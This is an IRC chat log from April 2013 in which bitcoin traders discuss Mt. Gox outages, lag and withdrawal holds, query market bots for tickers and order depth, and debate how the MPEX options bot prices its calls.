[-] Apr 12 20:06:53 [MPEX] [S.DICE] 1500 @ 0.0037 = 5.55 BTC [+] Apr 12 20:08:06 wtf can't w/d btc from gox w/o verification?! Apr 12 20:08:11 duh. Apr 12 20:08:39 guruvan: stop bitching, they are having pizza parties Apr 12 20:08:41 there i used deyyo's http://db.tt/vQj330VP Apr 12 20:08:47 down to verifying ~200/day Apr 12 20:08:56 market crashes, have a pizza party Apr 12 20:09:04 hahahaha Apr 12 20:09:13 need this with LAG on it for the picture : https://www.asi-ez.com/pix/Prod/MG-SIGNS_PVC.gif Apr 12 20:09:49 @guruvan, seriously, can't even withdraw BTC? Apr 12 20:10:07 where is the mtgox pizza story from? Apr 12 20:10:08 no and it isn't much BTC Apr 12 20:10:11 http://db.tt/vQj330VP Apr 12 20:10:13 fuck me Apr 12 20:10:13 oops Apr 12 20:10:17 [MPEX] [S.MPOE] 1000 @ 0.00073 = 0.73 BTC [+] Apr 12 20:10:22 like less than double digits? Apr 12 20:10:27 or close to triple digits Apr 12 20:10:29 yep Apr 12 20:10:30 'like 8 Apr 12 20:10:39 ;;calc 8 * 70 Apr 12 20:10:39 560 Apr 12 20:10:46 yeah, well under a thousand Apr 12 20:10:50 lol Apr 12 20:10:56 those fa#$%@ Apr 12 20:11:14 Well, they are holding incoming Bticoins way past 6 transactions Apr 12 20:11:25 that does it.....acct closure Apr 12 20:11:28 supposed to be 20 right? Apr 12 20:11:33 6 is for litecoins Apr 12 20:11:43 no 6 Apr 12 20:11:49 always been 6 Apr 12 20:12:58 ;;goxlag Apr 12 20:12:59 MtGox lag is 0.535276 seconds. During this time, light travels 0.00107268711075 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 12 20:13:10 ;;ticker Apr 12 20:13:12 BTCUSD ticker | Best bid: 75.40000, Best ask: 75.52445, Bid-ask spread: 0.12445, Last trade: 75.52445, 24 hour volume: 407138.79371493, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.40787 Apr 12 20:13:29 ;;bids 70 Apr 12 20:13:31 There are currently 6761.0366 bitcoins demanded at or over 70.0 USD, worth 486098.893975 USD in total. | Data vintage: 0.0039 seconds Apr 12 20:13:36 ;;market bus 1000 Apr 12 20:13:36 Error: The "Market" plugin is loaded, but there is no command named "bus" in it. Try "list Market" to see the commands in the "Market" plugin. Apr 12 20:13:42 ;;asks 75 Apr 12 20:13:43 There are currently 0 bitcoins offered at or under 75.0 USD, worth 0.0 USD in total. | Data vintage: 11.7401 seconds Apr 12 20:13:47 ;;bids 75 Apr 12 20:13:48 There are currently 324.92096 bitcoins demanded at or over 75.0 USD, worth 24420.8701994 USD in total. | Data vintage: 16.2594 seconds Apr 12 20:13:51 ;;market buy 1000 Apr 12 20:13:52 A market order to buy 1000 bitcoins right now would take 76513.2796 USD and would take the last price up to 78.0000 USD, resulting in an average price of 76.5133 USD/BTC. | Data vintage: 20.2961 seconds Apr 12 20:14:25 lol http://memearchive.net/memerial.net/6435/kim-jong-un-emo.jpg Apr 12 20:14:29 ;;bc,24hprc Apr 12 20:14:30 80.68 Apr 12 20:15:01 ;;seen smickles Apr 12 20:15:01 smickles was last seen in #bitcoin-assets 1 week, 1 day, 1 hour, 32 minutes, and 26 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 12 20:15:17 ;;market sell 1000 Apr 12 20:15:18 A market order to sell 1000 bitcoins right now would net 74661.2462 USD and would take the last price down to 73.8500 USD, resulting in an average price of 74.6612 USD/BTC. | Data vintage: 106.5025 seconds Apr 12 20:15:21 [MPEX] [S.MPOE] 100 @ 0.00072159 = 0.0722 BTC [-] Apr 12 20:15:35 ;;market --sell 5000 Apr 12 20:15:40 and Gox crashed again Apr 12 20:15:52 price got too high Apr 12 20:15:52 yeah Apr 12 20:15:54 A market order to sell 5000 bitcoins right now would net 362365.5204 USD and would take the last price down to 70.9000 USD, resulting in an average price of 72.4731 USD/BTC. | Data vintage: 142.5831 seconds Apr 12 20:15:55 needed a break Apr 12 20:16:00 fuck gox Apr 12 20:16:04 when it comes back, my $80 bid will be filled, and the price will be back down lol Apr 12 20:16:46 why did you put in an 80 bid oO Apr 12 20:16:50 yeah Apr 12 20:16:58 wait for 63 at least Apr 12 20:17:24 $avg Apr 12 20:17:25 pgp: 80.66 Apr 12 20:18:36 lol Apr 12 20:18:41 that's bottom ;-) Apr 12 20:19:31 ;;goxlag Apr 12 20:19:41 Error: Problem retrieving gox lag. Try again later. Apr 12 20:19:48 no gox Apr 12 20:20:02 [HAVELOCK] [SDICE] 7 @ 0.345 = 2.415 BTC [-] Apr 12 20:20:05 !ticker m ^OIX Apr 12 20:20:06 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 123.90251552 / 218.88143499 / 226.22012381 (14550 shares, 2,478.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 12 20:20:07 pathetic Apr 12 20:20:25 ;;tslb Apr 12 20:20:28 Time since last block: 35 seconds Apr 12 20:20:31 Nice Apr 12 20:20:46 ;;bids 70 Apr 12 20:21:06 No gox haha Apr 12 20:21:18 oh, bitcoin24 down D: Apr 12 20:21:29 more and more of a joke by the hour Apr 12 20:21:31 There are currently 6761.0366 bitcoins demanded at or over 70.0 USD, worth 486098.893975 USD in total. | Data vintage: 325.1259 seconds Apr 12 20:21:33 CampBx and bitstamp are up Apr 12 20:21:47 ;;goxlag Apr 12 20:22:02 Error: Problem retrieving gox lag. Try again later. Apr 12 20:22:05 ;;ticker Apr 12 20:22:22 Error: Failure to retrieve ticker. Try again later. Apr 12 20:23:06 what about a webcam in MTgox office ? no more lag ?? profit ??? Apr 12 20:25:25 pump up value put in sell orders, DDoS, public panic sells, you put in buy orders, DDoS, rinse and repeat... This is getting old fast. Apr 12 20:25:57 I wasnt able to find a pattern between ddos and prices yet Apr 12 20:26:03 lippoper1: wait for it though, the media attention has settled I think a lot of people have exited Apr 12 20:26:04 you think it goes down when it happens? Apr 12 20:26:14 the ddos just lags everything to make big moves Apr 12 20:26:25 ;;goxlag Apr 12 20:26:36 Error: Problem retrieving gox lag. Try again later. Apr 12 20:26:44 it does Apr 12 20:26:48 taub Apr 12 20:26:52 gox down hard again?!? Apr 12 20:26:58 yes Apr 12 20:27:27 thestringpuller, I think media attention will boom with reports of how people lost their life savings investing in BTC, etc... Apr 12 20:27:54 victims of their own success... lol... I'd like to victimize them... Apr 12 20:28:12 lippoper1: yea there wasn't much access to short selling or puts Apr 12 20:28:26 bitcoin-charts was knocked offline while gox was plummeting wednesday Apr 12 20:28:34 so mpoe-bot wasn't quoting Apr 12 20:28:36 gox back alive Apr 12 20:29:04 ;;goxlag Apr 12 20:29:06 MtGox lag is 1.753297 seconds. During this time, light travels 0.00351358755711 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Apr 12 20:29:39 see taub, the price didn't exactly drop this time, but you can see it flatlined there. Apr 12 20:30:00 When we send a bitcoin to Uranus , that is a problem Apr 12 20:30:20 i think they DDoSed it too hard, when I see lots of .01 listings and then the DDoS comes, that's guaranteed price drop. Apr 12 20:30:32 thestringpuller: if i remember bitcoincharts is sponsored by mtgox so they might host on similar lines Apr 12 20:31:21 btce now down Apr 12 20:32:32 nah - just flashes to cloudflare a little bit Apr 12 20:32:48 I think the headline on reddit now should be "USD skyrockets in value!!" Apr 12 20:32:58 ;;bc,24hprc Apr 12 20:32:59 80.65 Apr 12 20:33:02 with a nice 3day graph Apr 12 20:33:11 Well. I will be thrilled to plug up gox's verification queue with a few more people who will then never trade at gox again. Apr 12 20:33:28 when will people ove money to other exchanges? Apr 12 20:33:39 deposits flushed again. Apr 12 20:33:41 when they get verified apparently Apr 12 20:33:43 1 month Apr 12 20:33:47 yes Apr 12 20:33:53 since you can't even withdraw a f$^&#$ btc Apr 12 20:33:54 basically mtgox is keeping all funds hostage. Apr 12 20:34:03 and totally pulling a bfl Apr 12 20:34:09 i'm not transferring any btc in there anymore Apr 12 20:34:09 ie, advertising so as to get more noobs deposited. Apr 12 20:34:16 if this isn't a scam toppling over i don't know what is. Apr 12 20:34:18 mircea_popescu: im not following Apr 12 20:34:21 I only moved a little in for the excitement yesterday, and WTF shouldnt' they tell me it's a fucking roach hotel for bitcoins BEFORE deposit Apr 12 20:34:25 as I deposit Apr 12 20:34:45 gesell which part ? Apr 12 20:34:46 I have to agree mircea_popescu Apr 12 20:34:46 what part appears to be a scam. did i miss something? people can move out btc? Apr 12 20:34:53 no they can't. Apr 12 20:35:05 fractional reserve scam Apr 12 20:35:07 so there is a hold on getting your btc out of the exhange? Apr 12 20:35:07 really? Apr 12 20:35:16 they are claiming no fractional reserve though on reddit in the iama Apr 12 20:35:25 so it seems they are either lying thus scam Apr 12 20:35:28 is it titled "i am a fractional reserve ask me anything" ? Apr 12 20:35:30 tried to w/d FIVE BTC and gotta verify Apr 12 20:35:33 or they are overwhelmed to the brink Apr 12 20:35:49 mircea_popescu: pretty much have you read it yet? it's sort of amusing Apr 12 20:35:58 w/e - I don't give a damn what someone claims - prove it Apr 12 20:36:10 nope i've not./ Apr 12 20:37:38 video game time i guess Apr 12 20:37:40 nothing moving Apr 12 20:38:24 [MPEX] [S.MPOE] 2872 @ 0.00071888 = 2.0646 BTC [-] Apr 12 20:38:31 [MPEX] [S.MPOE] 5822 @ 0.00070317 = 4.0939 BTC [-] Apr 12 20:38:33 is there a link to this? Apr 12 20:38:44 wait - it works for verified and not for unverified? Apr 12 20:39:15 $avg Apr 12 20:39:18 deadweasel: 80.63 Apr 12 20:39:55 yeah they've locked btcwithdrawals for unverified accts. Apr 12 20:39:57 just keep suggesting to him to get legal counsel, he will need it Apr 12 20:40:00 78-79 here we come Apr 12 20:40:32 mircea_popescu: is mpex's requests servers distributed? Apr 12 20:40:33 are* Apr 12 20:40:40 yea Apr 12 20:40:46 it seems whenever you get ddos'ed the requests still get to mpex Apr 12 20:40:53 within milliseconds Apr 12 20:41:01 im magical like that. Apr 12 20:41:33 i've read the article you reference, but if mtgox isn't migrating to that model with all the money they are making from their success, you are more than right... Apr 12 20:42:03 so far what they've done is they've got a 128gbserver to run their shit in ram Apr 12 20:42:07 as if theres a difference Apr 12 20:42:21 i have raid 1+0 ssd's, they're probably faster than their ram Apr 12 20:42:52 mircea_popescu: they need bigger/faster machines to crash harder/faster Apr 12 20:43:11 it's ridiculous tho, this is not 1995. Apr 12 20:43:14 mircea_popescu: poland shutdown bitcoin-24... was that you?? :P Apr 12 20:43:16 I don't know I heard they're using DDR 800Mhz ram Apr 12 20:43:18 more memory is a moot point per se. Apr 12 20:43:30 gesell eh ?! Apr 12 20:43:32 That's like top of the line for their Pentium II Apr 12 20:43:42 architecture is fucked. there is no architecture. Apr 12 20:43:42 this is absurd 100 trades get in executed then it stops accepting requests Apr 12 20:43:47 or the requests are getting blocked Apr 12 20:44:08 blocked is likely Apr 12 20:44:49 basically from what can be seen from the outside they take each order and do a mysql select against the entire book Apr 12 20:44:56 with some badly chosen transforms Apr 12 20:44:58 thestringpuller: its actually just a timeout due to DoS Apr 12 20:45:04 lol Apr 12 20:45:05 i could see why in this architecture they couldn' Apr 12 20:45:10 t handle > 1 trade/second Apr 12 20:45:12 so it's like tcp dropping packets :( Apr 12 20:45:15 hamsters Apr 12 20:45:24 are taking a nap Apr 12 20:45:27 and getting water Apr 12 20:45:35 they'll be back spinning the wheels soon Apr 12 20:45:38 mircea_popescu: in addition with each trade they probably had to recalculate your fee bracket which meant querying the db to see previous trades. nuts Apr 12 20:45:50 0.0 Apr 12 20:46:39 they desperately need to hire somebody who knows wtf trading is and obey them. Apr 12 20:46:51 unfortunate for them that the 3-4 people who fit the bill and are in btc can't stand them Apr 12 20:47:14 ^^^^^^^^^ Apr 12 20:47:14 this Apr 12 20:47:59 doesn't help though, hate them or not, they cause the single most damage to bitcoin Apr 12 20:48:19 they have. Apr 12 20:48:29 so far they're the #1 black eye. Apr 12 20:48:36 can someone tell me, is it common in markets that i can place multiple orders despite not having the total sum required for all of them. such as i $5000 and i place two orders for 100btc at $50. obviously i dont have $50x200. Apr 12 20:48:48 ;;goxlag Apr 12 20:48:49 MtGox lag is 1.260122 seconds. During this time, light travels 0.00252527037897 AU. You could have sent a bitcoin from Earth to Moon (0.00257 AU). Apr 12 20:48:49 gesell: yes that is the norm in stock markets Apr 12 20:49:05 the amusing thing is, when i came into bitcoin, it was the same story, they fucked up big and crashed the market Apr 12 20:49:12 yet they are still here Apr 12 20:49:17 okay. ic. pipeline is there a logic for it or just how it is? Apr 12 20:49:18 to fuck it up continually Apr 12 20:49:33 gesell: a lot of your orders will never be executed, so why would they limit you? Apr 12 20:49:42 yeah Apr 12 20:49:54 worse thing is your order doesn't get filled. Apr 12 20:50:02 i dont understand... i would think that one would have to remove one order maxing their fiat before making another one Apr 12 20:50:16 not unless an order takes it all up first Apr 12 20:50:31 gesell most websites (etrade etc) will allow you to place any set of orders you wish. Apr 12 20:50:42 no exchange will tolerate this. any order placed is firm and executed. Apr 12 20:50:43 see on btc-e, once you place a bid or ask, they remove the balance from your account Apr 12 20:50:45 Not on Gox Apr 12 20:50:59 so basically... there's two things here. what are you discussing, the exchanges or the web selfserve brokers ? Apr 12 20:51:07 the bots Apr 12 20:51:29 The whales and the bots lol Apr 12 20:51:36 ;;goxlag Apr 12 20:51:37 MtGox lag is 0.92356 seconds. During this time, light travels 0.00185080389931 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 12 20:51:39 ;;ticker Apr 12 20:51:40 BTCUSD ticker | Best bid: 74.85000, Best ask: 75.00000, Bid-ask spread: 0.15000, Last trade: 74.85000, 24 hour volume: 410473.52836880, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.35474 Apr 12 20:52:23 yeah i guess my question relates more to whales building artificual walls. as these appear to be indicators for people Apr 12 20:52:25 i don't get it, nothing is moving on gox Apr 12 20:52:49 That explains why those "walls" disappear Apr 12 20:52:59 IF they show up Apr 12 20:53:03 without funds Apr 12 20:53:26 yeah lag reports iidle Apr 12 20:53:43 yeet no trades seemingly Apr 12 20:55:04 yeah very weird Apr 12 20:55:30 The more they say mtgox is manipulating the market, the more likely it seems, especially with this weirdness right now. Apr 12 20:56:02 stalemate at 75? Apr 12 20:56:03 i dont think so at all Apr 12 20:56:04 ;;ticker Apr 12 20:56:05 BTCUSD ticker | Best bid: 75.13000, Best ask: 75.89000, Bid-ask spread: 0.76000, Last trade: 75.13000, 24 hour volume: 413500.15314673, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.29544 Apr 12 20:56:18 ;;asks 75.89000 Apr 12 20:56:21 There are currently 0 bitcoins offered at or under 75.89 USD, worth 0.0 USD in total. | Data vintage: 0.0028 seconds Apr 12 20:56:33 ;;bids 75 Apr 12 20:56:33 There are currently 407.97339 bitcoins demanded at or over 75.0 USD, worth 30636.2108184 USD in total. | Data vintage: 12.1662 seconds Apr 12 20:56:37 ;;asks 75 Apr 12 20:56:38 There are currently 0 bitcoins offered at or under 75.0 USD, worth 0.0 USD in total. | Data vintage: 17.1069 seconds Apr 12 20:56:42 ;;asks 74 Apr 12 20:56:43 gox has some scaling issues, and architecture issues, some policy issues. but i think they just can fix them all in time to handle the load Apr 12 20:56:43 There are currently 0 bitcoins offered at or under 74.0 USD, worth 0.0 USD in total. | Data vintage: 21.4388 seconds Apr 12 20:56:49 ;;asks 76 Apr 12 20:56:50 There are currently 503.44177 bitcoins offered at or under 76.0 USD, worth 38260.2899496 USD in total. | Data vintage: 28.7110 seconds Apr 12 20:56:53 gesell: The Gox system accepts the orders, but puts them into a Pending state. I'm almost certain they don't appear on the books until they've switched to an Open state. That transition does a check to ensure you have the sufficient funds. Apr 12 20:57:31 oh that must be new Apr 12 20:57:34 Skarr_: yeah? thats something at least, if true. Will see if i can test this Apr 12 20:57:41 skarr is right Apr 12 20:58:14 [BTCTC] [ASICMINER-PT] 1 @ 0.7604 BTC [-] Apr 12 20:58:19 [BTCTC] [ASICMINER-PT] 8 @ 0.7605 = 6.084 BTC [+] Apr 12 20:58:21 gox back - wtf! Apr 12 20:58:44 Skarr_ this is how it used to be Apr 12 20:58:44 [MPEX] [S.MPOE] 8833 @ 0.00070274 = 6.2073 BTC [-] Apr 12 20:58:50 but they changed it a coupla days ago. Apr 12 20:58:52 no more pending orders. Apr 12 20:59:05 (it was a "great success" style pr communique, yes) Apr 12 20:59:07 ;;ticker Apr 12 20:59:08 BTCUSD ticker | Best bid: 75.20515, Best ask: 75.30000, Bid-ask spread: 0.09485, Last trade: 75.40000, 24 hour volume: 413800.63298868, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.29060 Apr 12 20:59:33 I thought they were putting the code change in on apr 17th Apr 12 21:00:16 I'm sure they threw a pizza party for that one too Apr 12 21:00:19 ;;bc,24hprc Apr 12 21:00:20 and no more gox codes either... Apr 12 21:00:20 80.57 Apr 12 21:00:22 mircea: you're kidding! I could put a 100,000 BTC buy on the books without funds? Apr 12 21:00:26 ordered some pizza with our btc Apr 12 21:00:36 Skarr_ no no. you can't make the order at all if not funded. Apr 12 21:00:47 wouldn't show up on book until funded Apr 12 21:00:51 pgp i might be confused, but afaik it was announced as already done Apr 12 21:00:52 bought some girl's pantyhose in a vending machine Apr 12 21:00:52 I thought they were putting the code change in on apr 17th << Apr 12 21:00:55 along with a live crab Apr 12 21:00:57 crazy japan Apr 12 21:01:03 mircea_popescu: i don't think they did it yet Apr 12 21:01:04 http://data.cnbc.com/quotes/MTGOXUSD :D Apr 12 21:01:10 Ahhhhhhh. You're right. They knocked it outta the park communicating that one. Thanks for the heads up. Apr 12 21:01:30 taub volume is still 0 Apr 12 21:01:34 I'll at least know to keep an eye on it now. Apr 12 21:01:42 if they did - i'm sure lag would be a lot better Apr 12 21:01:49 pgp no, they did i think Apr 12 21:01:53 Skarr_ you got the link ? Apr 12 21:02:55 mircea: which link? Apr 12 21:03:08 of mtgox announcing Apr 12 21:03:26 apr 17th https://mtgox.com/press_release_20130409.html Apr 12 21:04:01 that should take the edge off Apr 12 21:04:19 yes Apr 12 21:05:01 ahhh, ty Apr 12 21:05:06 it'll make gox passble until more profession exchange platforms come online Apr 12 21:05:14 passable Apr 12 21:05:23 professional Apr 12 21:05:35 what's the matter with me today - can't type or spell... Apr 12 21:05:48 taub, hah nice cnbc link! Apr 12 21:06:00 Okay ive tested how it handles multiple orders Apr 12 21:06:09 at least they never vanished with users funds Apr 12 21:06:37 even if they are slow... I think that's the reason tehy survive even if they can't make their exchange work right. Apr 12 21:09:54 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Apr 12 21:10:31 yes they even bailed out users of other exchanges like bitomat Apr 12 21:10:58 although they have pulled a mircea_popescu and rolled back before ;) Apr 12 21:11:45 So if I place two orders for BTC that "nearly" max out my FIAt what it does is fulfills the first and aadjusts the second to be for only the amount of FIAT left. Interestingly this will show up in the orderbooks (API2) but not the web interface Apr 12 21:11:48 ;;bc,24hprc Apr 12 21:11:49 80.69 Apr 12 21:12:05 [MPEX] [S.MPOE] 19000 @ 0.00070279 = 13.353 BTC [+] Apr 12 21:12:06 on the web UI it looks as though I have two orders both at near max of the FIAT Apr 12 21:12:16 pigeons hater. Apr 12 21:12:32 ;> Apr 12 21:12:53 mircea, got my message? Apr 12 21:13:00 I left with gribble? Apr 12 21:13:12 Also if interested... it takes 50 seconds for my order to show up in the http API based orderbooks (didnt check websockets). so if you are realying on the non-websocket API's for up to date information, DONT Apr 12 21:13:41 also lets be honest, all the exchanges probably have shitty code Apr 12 21:14:12 Namworld i'm aware the bot is in "we've been attacked by aliens" mode. Apr 12 21:14:59 eheh, no, I mean, the algorythm might need to be changed a bit Apr 12 21:15:27 so that asks prices for calls tend toward 1 for example without ever reaching it. Apr 12 21:15:35 ;;ticker Apr 12 21:15:40 BTCUSD ticker | Best bid: 75.92000, Best ask: 75.99000, Bid-ask spread: 0.07000, Last trade: 75.99000, 24 hour volume: 415482.07084261, 24 hour low: 54.25000, 24 hour high: 140.00000, 24 hour vwap: 82.26400 Apr 12 21:16:02 if mp is doing something that you think needs to be changed, its really intentional Apr 12 21:16:09 ;;bc,24hprc Apr 12 21:16:10 80.69 Apr 12 21:16:11 Apr 12 21:17:32 For example, the calls struck at 41 USD/BTC will be in the money at... -1885.90 USD Apr 12 21:17:51 I'd love for someone to pay me that much for the privilege of offloading their BTC into my hands Apr 12 21:18:08 Namworld it's not even negative. Apr 12 21:18:11 it's above infinity. Apr 12 21:18:13 whatever that means. Apr 12 21:19:58 technically it's: strike / (1 - ask) Apr 12 21:20:16 if ask is higher than one, it's strike divided by a negative number Apr 12 21:20:20 so a negative number Apr 12 21:20:30 Infinity would put value of call at 1 Apr 12 21:20:57 yeah well that formula only works for ask < 1 Apr 12 21:21:01 otherwise it's no longer equivalent Apr 12 21:22:12 Anyway Apr 12 21:22:26 Bot asks for mad high prices, it's funny Apr 12 21:22:58 [MPEX] [S.DICE] 1615 @ 0.00348384 = 5.6264 BTC [-] Apr 12 21:23:04 yeah Apr 12 21:23:20 the sort of drop it's seen (260 -> 50) makes it think the world is ending really. Apr 12 21:23:31 well Apr 12 21:23:44 it's small when you consider $36 -> $2? Apr 12 21:24:04 true Apr 12 21:24:18 yeah, well I noticed the more volatility there was, the higher the asks the bot asks for Apr 12 21:24:22 already Apr 12 21:24:25 18x --> 5x hope next time isn't just a boring old 2x boo Apr 12 21:24:26 meanwhile over at my blog Apr 12 21:24:28 i thought $70 would be a good number for 2013, i did a large buy at $30 feeling that way Apr 12 21:24:28 "i have spent 8 years in romania, and im shocked that this mind is coming from this country :)" Apr 12 21:24:33 *shrugs* Apr 12 21:24:39 joecool : the bot wasn't there then Apr 12 21:24:41 ;;bc,24hprc Apr 12 21:24:42 80.66 Apr 12 21:24:46 the bot was born august 2011ish, Apr 12 21:25:05 and based on the past history it had an engine made. as i said yest, i think security and pricing got melded together in some edge cases Apr 12 21:25:19 we're still working to mapping out this entire thing, it's not exactly a trivial task Apr 12 21:25:56 i see bots implied volatility at 600-700 on ask prices of calls Apr 12 21:26:13 woot, sent dust spam to sd on less than 2000 and won Apr 12 21:26:18 haha wd. Apr 12 21:26:40 pgp his point is valid tho, should never be quoting above 1. rough edge there. Apr 12 21:26:52 [BTCTC] [ASICMINER-PT] 1 @ 0.7689 BTC [+] Apr 12 21:26:55 yes Apr 12 21:27:00 [BTCTC] [ASICMINER-PT] 1 @ 0.7695 BTC [+] Apr 12 21:27:22 $avg Apr 12 21:27:23 pgp: 80.66 Apr 12 21:27:25 [MPEX] [S.MPOE] 5850 @ 0.0007085 = 4.1447 BTC [+] Apr 12 21:27:30 [MPEX] [S.MPOE] 167 @ 0.00070279 = 0.1174 BTC [-] Apr 12 21:27:32 [MPEX] [S.MPOE] 6309 @ 0.00070071 = 4.4208 BTC [-] Apr 12 21:27:38 Well even when it was quoting under, breakeven went skyhigh near the lowest calls Apr 12 21:27:51 that's somewhat to be expected. Apr 12 21:28:24 yeah. Could be improved upon tho so the effect is less and the low calls are actually good Apr 12 21:28:30 they never traded, almost Apr 12 21:28:50 albeit if they were priced correctly, they would be lowest gain but also lowest losses Apr 12 21:28:57 If people wanted less leverage Apr 12 21:31:32 mp: so all puts mispriced right now? Apr 12 21:31:48 yea Apr 12 21:32:00 ^ Namworld Apr 12 21:33:43 but the implied vol on the calls just doesn't seem worth it given where we are now... Apr 12 21:33:51 Dare I say the market is becoming stable? Apr 12 21:35:05 lippoper1: sort of gox is lagging in taking orders Apr 12 21:35:16 so it's super intermittent trading Apr 12 21:35:22 other exchanges are reporting higher prices Apr 12 21:35:48 pgp i wouldn't say mispriced necessarily. Apr 12 21:36:00 they are just very expensive to my eyes. but it's what bot thinks. Apr 12 21:36:25 well they were right, solved excessive lag by crashing frequently Apr 12 21:37:39 all the ask prices are the same from C119T to C389T... Apr 12 21:37:46 how does that make sense? Apr 12 21:38:29 [BTCTC] [ASICMINER-PT] 1 @ 0.7696 BTC [+] Apr 12 21:38:36 cause it won't sell a call for under x. Apr 12 21:39:08 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Apr 12 21:39:28 bot has a "won't sell a call for under X" to protect the book from padding. this because of the open auction style of the bonds financing it. you understand what i mean ? Apr 12 21:39:53 mircea_popescu: what do you mean by padding? Apr 12 21:40:20 i mean this : each call sold counts as 1 BTC in the needed capital. Apr 12 21:40:40 if someone ahs a bond in at say 25% and there are 10k btc at lower % than him Apr 12 21:41:00 he could theoretically buy 10k calls for 10 BTC total, so at 0,001 and then get 25 btc for his b ond Apr 12 21:41:02 ie, padding the book. Apr 12 21:41:32 i see Apr 12 21:41:48 this is an artefact of how the bot is financed, not a mispricing per se,. Apr 12 21:42:05 now, exactly how much he considers that cutorff to be... in many months it was 0.02 or 0.03 etc. Apr 12 21:42:25 now it's 0.26 so based on the volatility we could say bot is hinting at interest rates over 50% per month. Apr 12 21:43:07 aha - that makes sense... Apr 12 21:43:44 well it also is motherfcucking insane on a stick. Apr 12 21:43:53 but i am loath to change it because i have never done so yet. Apr 12 21:44:52 nonetheless - your "cheapest" call from an impl vol perspective is C116T. avg would need to go to $139 in two weeks to breakeven - tough call... Apr 12 21:45:00 well yeah Apr 12 21:45:07 on the other hand... last week it went 100 to 260 Apr 12 21:45:12 what's a bot to do Apr 12 21:45:18 lol Apr 12 21:45:20 the bot life didn't choose you Apr 12 21:45:24 you chose the bot ife Apr 12 21:45:28 life* Apr 12 21:45:36 no but srsly. from this perspective i could see it wanting 200 for breakeven wtf. Apr 12 21:45:37 gypsy! Apr 12 21:45:38 lmao Apr 12 21:45:42 tiberiusiv the greatest troll in the world Apr 12 21:45:49 !ticker m ^OIX Apr 12 21:45:51 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 123.90251552 / 218.88143499 / 226.22012381 (14550 shares, 2,478.62 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 12 21:45:53 i swear he's EskimoBob Apr 12 21:45:58 oh wow Apr 12 21:46:17 i haven't seen that idiot in a minute Apr 12 21:46:26 EskimoBob still around? Apr 12 21:46:34 lol Apr 12 21:46:43 tiberiusiv: what do you even contribute to Apr 12 21:46:44 mr. Apr 12 21:46:46 except that in most asset classes, when bubbles burst, impl vol goes down, not up... Apr 12 21:46:57 pgp i agree. Apr 12 21:47:10 but then again that assume many market makers... Apr 12 21:47:17 here we just have the bot Apr 12 21:47:23 pgp i am not saying the bot is right here. i am just saying, it's not directly obvious to me how it is wrong and how much. Apr 12 21:47:35 i know Apr 12 21:47:41 we have two year's worth of market data here, Apr 12 21:47:44 and junk data at that. Apr 12 21:47:48 and junk market to begin with Apr 12 21:48:19 we;ve done more collective shrugging this past week than the shrugging monks of livonia. Apr 12 21:48:22 merely opining - i don't know what the right price should be... Apr 12 21:48:24 how is it an edge if no one buys them? Apr 12 21:49:08 but wait... Apr 12 21:49:27 yes big loss in BTC terms - but not in fiat terms Apr 12 21:50:17 how does losing money make him a scammer? Apr 12 21:50:26 bondholder haircut was how much last month? Apr 12 21:50:44 how much did BTC go up last month? Apr 12 21:50:46 like 20% Apr 12 21:50:47 no 20% Apr 12 21:50:51 23 or so Apr 12 21:50:51 also Apr 12 21:50:58 if you cahsed out your shit in fiat Apr 12 21:51:00 there was no loss.. Apr 12 21:51:07 and btc went from high 20s to mid 90s in march fiscal Apr 12 21:51:17 IN BTC Apr 12 21:51:19 and from mid 90s to 260ish on the spot in april, and then down Apr 12 21:51:38 if you paid less for the btc than what you got out Apr 12 21:51:40 then you win Apr 12 21:51:45 i don't see the issue Apr 12 21:51:46 you have to consider fiat, because the bond investment is selling fiat options Apr 12 21:51:59 not at all? Apr 12 21:52:04 i lost more money on mt gox Apr 12 21:52:13 indirectly Apr 12 21:52:18 tiberiusiv: how about you shut up Apr 12 21:52:27 neither do you, you sit around and complain Apr 12 21:52:28 fine - if BTC is you base curreny, you lost... Apr 12 21:52:41 it's like SDICE... Apr 12 21:52:52 ;;nethash Apr 12 21:52:53 66887.959038 Apr 12 21:53:01 tiberiusiv: don't speak unless you contribute something to economy other than being a troll Apr 12 21:53:02 betting is inelastic to BTC price Apr 12 21:53:19 to be perfectly fair : we have jackshit for data as to all these things. Apr 12 21:53:25 how elastic betting is to btc price... Apr 12 21:53:27 stuff like that. Apr 12 21:53:30 big move up in USD/BTC, big move down in BTC denominated shares of SDICE... Apr 12 21:54:06 yeah its not really known how elastic betting is to btc price, and it isnt really knowable because the users and their behavior may change Apr 12 21:54:10 except the move happened before. Apr 12 21:54:17 if you look at it it doesn't correlate too well. Apr 12 21:54:35 moreover, pretty much all financials got axed as people flew towards the exchange to play there. Apr 12 21:54:43 yest btc was flowing back Apr 12 21:54:55 in fact keiser+idiot friends created a situation much like pirate. Apr 12 21:54:59 Only the bonds thing would hurt, not the exchange Apr 12 21:55:06 Bot goes out when it runs out of funds Apr 12 21:55:22 [MPEX] [S.DICE] 10 @ 0.00369999 = 0.037 BTC [+] Apr 12 21:55:30 So really, another loss reduce bondholders which reduce how many options the bot can make Apr 12 21:55:31 mircea_popescu: what do you mean about keiser? Apr 12 21:55:38 people might even agree with you some tiberiusiv if you lost the racism, the eskimobobism, the blind rage ignoring facts, etc Apr 12 21:55:41 i am not advocating that call should be cheaper - mp has to do whatever he thinks is right - just making observations... Apr 12 21:55:43 !ticker m s.dice Apr 12 21:55:45 [MPEX:S.DICE] 1D: 0.00296405 / 0.0033407 / 0.00373333 (62627 shares, 209.22 BTC), 7D: 0.0027 / 0.00292871 / 0.00373333 (277523 shares, 812.79 BTC), 30D: 0.0027 / 0.00348923 / 